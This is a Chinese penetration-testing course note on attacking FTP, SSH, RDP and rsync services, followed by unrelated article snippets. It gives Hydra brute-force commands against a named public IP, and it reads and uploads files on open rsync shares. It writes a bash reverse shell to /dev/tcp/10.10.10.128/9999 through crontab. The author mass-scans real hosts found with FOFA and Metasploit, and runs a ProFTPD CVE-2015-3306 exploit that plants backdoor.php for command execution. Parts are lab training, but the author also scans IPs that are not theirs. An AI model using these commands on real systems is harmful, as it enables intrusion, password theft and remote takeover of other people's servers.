【小迪安全2023】第57天:服务攻防-应用协议RsyncSSHRDPFTP漏洞批扫口令猜解

embedded/2024/9/22 15:12:55/
🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

大纲

知识点

FTP%26RDP%26SSH-toc" style="margin-left:80px;">1、口令猜解-Hydra-FTP&RDP&SSH

2、配置不当-未授权访问-Rsync 文件备份

fofa%E8%BF%9B%E8%A1%8C%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B-toc" style="margin-left:80px;">3、MSF配合fofa进行批量检测

FTP%26Proftpd%20%E6%90%AD%E5%BB%BA-toc" style="margin-left:80px;">4、协议漏洞-应用软件-FTP&Proftpd 搭建


大纲

知识点

1、服务攻防-远程控制&文件传输等

2、远程控制-RDP&RDP&弱口令&漏洞

3、文件传输-FTP&Rsync&弱口令&漏洞

#章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击#前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

FTP%26RDP%26SSH">1、口令猜解-Hydra-FTP&RDP&SSH

Hydra爆破工具:

GitHub - vanhauser-thc/thc-hydra: hydra

但是我们平常做渗透测试爆破口令之类的都直接在kali里面使用,kali自带很多工具,下面这个是一个很强大的爆破字典:

GitHub - TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。

hydra是一个自动化的爆破工具,暴力破解弱密码,
是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
例子:
FTP:文件传输协议
RDP:Windows远程桌面协议
SSH:Linux安全外壳协议ftp爆破:hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
ssh爆破:hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
rdp爆破:hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V字典:fuzzDicts-master项目

爆破rdp密码:

利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破

ftp爆破最大的特点是账号密码都不确定,账号密码都需要使用字典

这里由于节省时间,直接告诉他账号,真是环境账号密码都需要利用字典

2、配置不当-未授权访问-Rsync 文件备份

rsync 文件传输协议-linux  端口873

配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

靶场环境地址:

Vulfocus 漏洞威胁分析平台

判断是否有该漏洞的方法:

┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334

利用读取文件,拿到flag

┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334/src┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334/src/tmp/     #这里tmp目录后面一定要接/,要不然flag找不到

上次文件:

┌──(root💀kali)-[~/桌面]
└─# rsync -av kali.png  rsync://123.58.224.8:21419/src/tmp/kali.png
sending incremental file list
kali.pngsent 512,846 bytes  received 35 bytes  341,920.67 bytes/sec
total size is 512,626  speedup is 1.00┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:21419/src/tmp/                  
drwxrwxrwt          4,096 2024/04/23 22:51:30 .
-rw-r--r--              0 2024/04/23 22:44:18 flag-{bmhad0ff7c7-f192-4388-bba9-1911279ec5a9}
-rwxrw-rw-        512,626 2024/04/19 04:24:19 kali.png

反弹shell:

先把/etc/crontab进程任务下载到本地当前目录下

写个反弹shell:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/9999 0>&1

详细步骤如下:

kali提前进行反弹shell监听,

由于我这个使用的是在线的靶场环境,所以时间不够,师傅们可以使用本地docker启动环境,具体参考文章如下:

Vulhub - Docker-Compose file for vulnerability environment

fofa%E8%BF%9B%E8%A1%8C%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B">3、MSF配合fofa进行批量检测

Fofa_Viewer是一个简单易用的fofa客户端,由 WgpSec狼组安全团队 f1ashine 师傅主要开发。程序使用 JavaFX 编写,便于跨平台使用,相比与web端的方式查询,其启动与搜索速度都有比较明显的提升!接下来介绍一下如何使用吧!

# JDK8 版本
链接:https://pan.baidu.com/s/1Tq4v04d4Axoun4SYo2JCew 
提取码:lnke
# JDK11 以及更高的 Java 版本
链接:https://pan.baidu.com/s/1TwjkvCdIYuOn6_TByojkRQ 
提取码:0uob

输入下面的命令以后,需要我们手动修改如下的配置:

java -jar fofaviewer.jar

小迪的查询结果:

配合msfconsole

我这里随机把小迪的一些IP来测试,保存在ip.list文件中

然后我们再在kali上打开MSF

msf6 > use auxiliary/scanner/rsync/modules_list 
msf6 auxiliary(scanner/rsync/modules_list) > show options Module options (auxiliary/scanner/rsync/modules_list):Name                 Current Setting  Required  Description----                 ---------------  --------  -----------RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'RPORT                873              yes       The target port (TCP)TEST_AUTHENTICATION  true             yes       Test if the rsync module requires authenticationTHREADS              1                yes       The number of concurrent threads (max one per host)msf6 auxiliary(scanner/rsync/modules_list) > set rhosts file:/root/桌面/ip.list
rhosts => file:/root/桌面/ip.list
msf6 auxiliary(scanner/rsync/modules_list) > set threads 10
threads => 10

run一下,

[+]号代表有该漏洞

为了确认是否正确,这里开一台靶机测试,扫描后发现成功发现了。

FTP%26Proftpd%20%E6%90%AD%E5%BB%BA">4、协议漏洞-应用软件-FTP&Proftpd 搭建

proftpd 是linux软件启动ftp服务

ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。

靶场环境:

Vulfocus 漏洞威胁分析平台

访问漏洞地址,是个apache页面

我们使用官网的exp进行执行命令:

GitHub - t0kx/exploit-CVE-2015-3306: ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container

执行下面的命令

python exploit.py --host 123.58.224.8 --port 42907 --path "/var/www/html/"

然后访问/backdoor.php?cmd=whoami,就可以进行任意命令执行了


http://www.ppmy.cn/embedded/20967.html

相关文章

基于Promise + XHR 封装myAxios函数

在JavaScript中&#xff0c;你可以使用Promise和XMLHttpRequest&#xff08;XHR&#xff09;来封装一个名为myAxios的函数&#xff0c;用于执行HTTP请求。下面是一个简单的示例&#xff0c;它封装了GET和POST请求的基本功能&#xff1a; function myAxios(url, method GET, da…

加速博客体验:静态资源优化技巧大揭秘!

如今有许多人涉足博客写作&#xff0c;其中大多数正处于博客创作的旅程中。每位程序员都梦想拥有自己的服务器&#xff0c;理想情况下&#xff0c;服务器配置越高越好&#xff0c;价格越实惠越好。购买一台基础款服务器用于建立博客是一个不错的选择&#xff0c;因为并不需要处…

如何拥有自己的私有docker仓库

当然可以&#xff0c;以下是搭建私有Docker仓库的详细步骤&#xff1a; 一、准备工作 确定服务器&#xff1a;首先&#xff0c;你需要有一台服务器&#xff0c;用于部署Docker私有仓库。这台服务器需要安装Docker&#xff0c;并且有足够的存储空间来存储镜像。 检查Docker版本…

有哪些好用的外贸获客软件啊?

外贸获客软件是外贸业务中非常重要的工具&#xff0c;它们能够帮助企业更有效地找到潜在客户&#xff0c;提高业务效率。以下是一些比较好用的外贸获客软件&#xff1a; 易谷歌地图数据采集大师&#xff1a;基于谷歌地图的采集工具&#xff0c;可以采集任意国家、任意地区的公司…

探索和构建 LLaMA 3 架构:深入探讨组件、编码和推理技术(八)Transformer块

探索和构建 LLaMA 3 架构&#xff1a;深入探讨组件、编码和推理技术&#xff08;八&#xff09;编码器块 Transformer块 由于 只关注模型的推理&#xff0c;因此 只会研究transformer块 class EncoderBlock(nn.Module):def __init__(self, args: ModelArgs):super().__init__…

C语言入门课程学习笔记-6

C语言入门课程学习笔记-6 第27课 - 字符数组与字符串&#xff08;上&#xff09;第28课 - 字符数组与字符串&#xff08;下&#xff09;第29课 - 数组专题练习&#xff08;上&#xff09;第30课 - 数组专题练习&#xff08;下&#xff09; 本文学习自狄泰软件学院 唐佐林老师的…

学习java第五十三天

Spring器中的bean可以分为5个范围&#xff1a; singleton&#xff1a;这种bean范围是默认的&#xff0c;这种范围确保不管接受多少请求&#xff0c;每个容器中只有一个bean的实例&#xff0c;单例模式&#xff1b; prototype&#xff1a;为每一个bean提供一个实例&#xff1b…

【数据结构】链表经典算法OJ题目练习

203. 移除链表元素 - 力扣&#xff08;LeetCode&#xff09; 思路1&#xff1a;遍历原链表&#xff0c;将val链表释放掉 思路2&#xff1a;创建新链表 206. 反转链表 - 力扣&#xff08;LeetCode&#xff09; 思路1&#xff1a;创建新链表&#xff0c;将原链表中的节点拿过来…